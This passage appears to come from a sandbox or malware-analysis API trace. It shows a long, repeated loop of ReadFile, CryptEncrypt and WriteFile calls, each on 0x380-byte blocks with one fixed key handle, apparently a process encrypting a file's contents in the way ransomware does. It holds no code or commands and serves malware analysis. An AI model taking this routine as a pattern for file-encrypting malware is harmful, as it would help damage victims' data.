pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.402] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.402] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.402] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.402] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.402] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.402] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.402] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.402] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.402] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.402] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.402] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.403] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.403] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.403] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.403] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.403] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.403] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.403] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.403] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.403] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.403] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.403] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.403] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.404] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.404] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.404] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.404] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.404] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.404] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.404] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.404] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.404] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.404] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.404] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.404] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.404] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.405] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.405] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.405] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.405] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.405] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.405] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.405] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.405] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.405] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.405] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.405] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.405] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.405] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.406] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.406] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.406] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.406] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.406] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.406] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.406] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.406] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.406] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.406] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.406] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.406] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.406] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.407] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.407] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.407] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.407] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.407] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.407] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.407] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.407] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.407] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.407] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.407] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.407] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.407] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.407] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.408] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.408] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.408] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.408] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.409] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.409] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.409] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.409] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.409] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.409] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.409] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.409] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.409] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.409] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.409] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.409] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.409] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.410] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.410] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.410] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.410] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.410] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.410] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.410] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, 